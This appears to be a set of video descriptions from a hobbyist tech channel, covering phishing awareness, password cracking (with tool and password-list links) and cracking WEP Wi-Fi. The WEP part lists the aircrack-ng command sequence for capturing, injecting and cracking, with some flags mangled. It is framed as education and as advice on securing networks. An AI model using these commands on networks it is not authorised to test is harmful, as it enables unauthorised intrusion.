Phishing is a means of fooling people into giving you their private information. This video shows the basics of how phishing schemes work so that you can avoid becoming a victim.
http://www.tinkernut.com/chat
http://www.tinkernut.com/forum
This video is an introduction to the science behind password cracking. If your curious about what it’s all about, then this video is for you!
500 Worst Passwords of all time:
http://www.whatsmypass.com/the-top-500-worst-passwords-of-all-time
Appnimi PDF Unlocker:
http://www.appnimi.com/file/pdf-unlocker
Password complexity cracking stats:
http://www.lockdown.co.uk/?pg=combi
This video shows one method of hacking a wireless WEP connection and gives you some tips on how to better secure your wireless.
WEBSITES:
http://www.backtrack-linux.org
http://www.imgburn.com
TERMINAL COMMANDS:
Startx
/etc/init.d/networking start
airmon-ng
airmon-ng stop [wireless card name]
airmon-ng start [wireless card name]
airmon-ng
airodump-ng [wireless card name]
ctrl c
airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name]
aireplay-ng -1 0 a [bssid] [wireless card name]
aireplay-ng -3 b [bssid][wireless card name]
ctrl + c
dir
aircrack-ng [filename]